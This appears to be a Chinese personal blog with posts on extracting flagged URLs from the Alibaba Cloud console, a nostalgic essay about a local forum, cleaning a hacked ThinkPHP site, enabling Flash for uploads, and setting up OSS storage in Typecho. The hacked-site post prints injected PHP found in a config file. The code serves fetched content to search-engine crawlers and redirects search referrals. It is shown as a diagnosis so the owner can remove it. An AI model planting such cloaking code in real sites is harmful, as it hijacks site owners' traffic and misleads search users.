2019年6月

在阿里云控制台提取“互联网有害信息”网址

问题:Discuz!论坛被恶意批量发布低俗内容,被阿里云风控自动检查到,记录在云盾控制台“互联网有害信息”分类里,因为长网址不直接显示出来,需要将鼠标放在长网址上,才会显示完整。当前云盾控制台无网址导出功能,人工一个个网址复制出来,很费劲。

url-filter-1.png

尝试:
a. 如果是短的网址,可直接在列表显示完整的,直接复制到如Excel表就可以
url-filter-2.png

b. 如果是长的网址,可通过浏览器的“开发人员调试工具”,查看到相应的网页源码,将源码内容复制到如notepad++中,用正规则来替换,如将 =.?"(http://www.hyhp.net/.?)"|.*= 替换为 $1\n
url-filter-3.png

参考:https://stackoverflow.com/questions/45380483/notepad-regex-get-all-full-links-that-begins-with-a-string-in-a-html

在,和平社区

Davis_Chen在2018年8月5日发帖《和平社区,你还在吗》,感慨社区网站冷清。如帖子里提到的,人人都有智能手机,手机上都有微信,人们随时随地可加好友,拍照发到朋友圈。当你用上了第三部智能手机时,社区的人气锐减到可以用个数来统计了。

月初,受坛友之托,备份出社区网站的文件。了解得知,社区网站在约半年前已经不能访问了。整理着网站的一些帖子,像翻开了日志本,回想起以前在社区网站过的时光。那几年里,我看帖、回帖和发帖都挺积极的。骑单车在县城或四周逛,用数码相机拍好些老屋和路景的相片,回家后整理,附上文字发帖。期待着网友对帖子的回复,如碰巧网友回帖说“哎呀!你怎么逛到我老家啦。”或“哦……路铺好水泥了呀!”如果帖子能给坛友带来老家的“印象”,会让我很有成就感。有时我也发帖分享自己买了什么东西、做了什么菜、或看到了些“奇怪”的事物。经常地的拍照发帖,想引得坛友的点评。社区是我个人的展现平台,在社区网站里通过帖子,我表达了自己,向网友展现了一个“东山三”的形象。社区也是人与人之间的交流渠道,在社区网站里通过帖子,我认识“和平水豆腐”、“和平龙少”、“牛肚胱”、“默默”、“黑鹰”、“自家人眼镜”、“乐小乐“、”“放牛班的春天”和“冰芯”等人。或许有的坛友第一份工作是在社区网站找到的,或许有一对对甜蜜的姻缘是通过社区网站促成的……

随着导出导入的数据越多,想起记录在社区网站里的小事、趣事就越多。看着坛友们的头像和昵称,勾起好些挺好玩的回忆,有时忍不住笑出声来。偶然间,发现如今我在微信发的朋友圈不也是用相似的“风格”吗?形式上,也是有图有文字,时不时夹稳有“和平土话”的内容。本质上,在社区上的发帖子和发微信朋友圈的,都是我,“东山三”还在。曾在同一个地方出生、生活的;说着同一种语言聚在一起网上交流的坛友们呢,你们还在吗?

“在,我在。”abc123说。
“在,我在。”冰芯答。
“在,我在。”清凉答。
“在,我在。”星空答。
“在,我在。”河风答。
……

更高兴的是,社区网站的创始人“清凉”,他说会尽快安排网站恢复线上访问,不能让这记录了众多网友美好回忆的“日志本”丢了。是啊,和平社区还在。即使我们人在慢慢变老,但我们的感情以前就在,现在在,希望将来还在。

查找网站访问被跳转到其它网址原因一例

感谢“*zy”的鼓励和支持。

一网友说他的网站被“黑”了,现象是,在搜索引擎里搜索网址,收录的首页是一个X彩的网站内容,且点击搜索引擎链接进入网站,会随机出现一些其它站点的内容。但直接在浏览器里输入网址就正常。

过程:

1.在网上搜索了一些资料,说有可能是根据访问者的 http User Agent 和 http_referer 来跳转或显示不同内容的
bbs-aliyun-dongshan3-325100-1.png

bbs-aliyun-dongshan3-325100-2.png

2.同一台服务器上的另一个站点不会出现类似的现象,所以就重点看发生问题的站点文件

3.站点是用 ThinkPHP 框架写的,尝试替换 ThinkPHP 的文件内容,无效

4.尝试替换 app 里的内容,也是无效

5.鼓捣了很久(我是门外汉,不懂php编程和网站的安全运维),无意中,看到日志文件中出现 NOTIC: [8] Undefined index: HTTP_REFERER 的字样
bbs-aliyun-dongshan3-325100-3.png

6.找到相应的文件,有以下php代码

<?php
$arr = array('baidu','360','so','Sogou','bing','yisou','sm','google');
for($i=0;$i<count($arr);$i++){
    if (ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {
        $file = file_get_contents('http://bbs.aliyun.com/');
        echo $file;
        exit;
    }
}
$arr1 = array('baidu','360','so','Sogou','bing','yisou','sm','google');
for($j=0;$j<count($arr1);$j++){
    if (ereg($arr1[$j], $_SERVER["HTTP_REFERER"])) {
        Header("Location: https://www.aliyun.com/");
        exit;
    }
}
return array (
  'DB_HOST' => 'localhost',
  'DB_NAME' => 'dbname',
  'DB_USER' => 'dbuser',
  'DB_PWD' => 'dbpassword',
  'DB_PORT' => '3306',
  'DB_PREFIX' => 'xxx_',
);

7.注释掉怀疑的代码(return array 上边的)后测试,正常了

参考:《网站被黑检测》 - http://s.tool.chin az.com/tools/webcheck.aspx

为浏览器启用flash player插件,上传图片

较早之前,发现在火狐浏览器里不能成功上传图片到帖子了,对比了谷歌和微软的Edge浏览器,也是不成功。梦版主说UC浏览器可以。

所以,有一段时间,发帖的文字是在火狐浏览器里完成,之后再打开UC浏览器,补上图片,显得有些麻烦。

一直不知道原因,前些天,看到贝管提到,元芳版主说,在浏览器里启用flash player插件就可以了。

过程:

1.现在新版本的浏览器,如火狐,谷歌的,访问一个包含有flash内容的站点时,默认设置为“先询问”,让用户自己选择是否启用flash player的插件。如在论坛快速回帖中,弹出的上传图片并没有让浏览器弹出对话框选择是否允许运行flash,所以让包括我在内的云友摸不着头脑,以为论坛改版导致上传图片失败
bbs-aliyun-dongshan3-324975-1.png

2.在火狐浏览器中,访问一个站点时,可以通过点击地址栏前边的“管理插件”小图标,来允许指定的站点显示flash内容,配置插件的入口是:about:addons
bbs-aliyun-dongshan3-324975-2.png

bbs-aliyun-dongshan3-324975-3.png

3.在谷歌浏览器中,配置flash行为的入口是:chrome://settings/content/flash ,可以输入如 [*.]aliyun.com 的网址,允许所有的阿里云站点显示 flash 内容
bbs-aliyun-dongshan3-324975-4.png

bbs-aliyun-dongshan3-324975-5.png

4.允许阿里云的网站显示flash内容后,就可以正常在帖子里上传图片了
bbs-aliyun-dongshan3-324975-6.png

参考:

在typecho里用阿里云OSS作为附件存储

typecho的博客程序挺简洁,想到好象两年前开通的阿里云OSS还没使用,所以就想在typecho里配置。

环境:typecho 1.0,AliOssForTypecho 1.0.1 插件(需php-curl组件)

过程:

1.在OSS管理控制台里,创建好存储桶,如 mytest ,且绑定了 alioss.anqun.org 的域名
bbs-aliyun-dongshan3-324900-1.png

2.在Web服务里新建 alioss.anqun.org 的站点,且配置好SSL证书,反向代理到存储桶的内网域名,如 mytest.oss-cn-hangzhou-internal.aliyuncs.com
bbs-aliyun-dongshan3-324900-2.png

3.在typecho站点后台,启用 AliOssForTypecho 的插件,且配置好相应的参数,如本例是:

Bucket名称:mytest 
ACCESS_ID:您的阿里云账户 AccessKeyID 
ACCESS_KEY:您的阿里云账户 AccessKeySecret 
连接Bucket节点所用地址:oss-cn-hangzhou-internal.aliyuncs.com 
要储存的路径:typecho/ 
自定义域名:alioss.anqun.org

bbs-aliyun-dongshan3-324900-3.png

bbs-aliyun-dongshan3-324900-4.png

4.因为本例是使用了https,所以手动更改了插件中的 Plugin.php 文件,约第 489 行,将返回地址中的 http 更改为 https
bbs-aliyun-dongshan3-324900-5.png

5.在typecho发文章测试,成功
bbs-aliyun-dongshan3-324900-6.png

参考: AliyunOSS for typecho插件 - http://forum.typecho.org/viewtopic.php?f=6&t=8864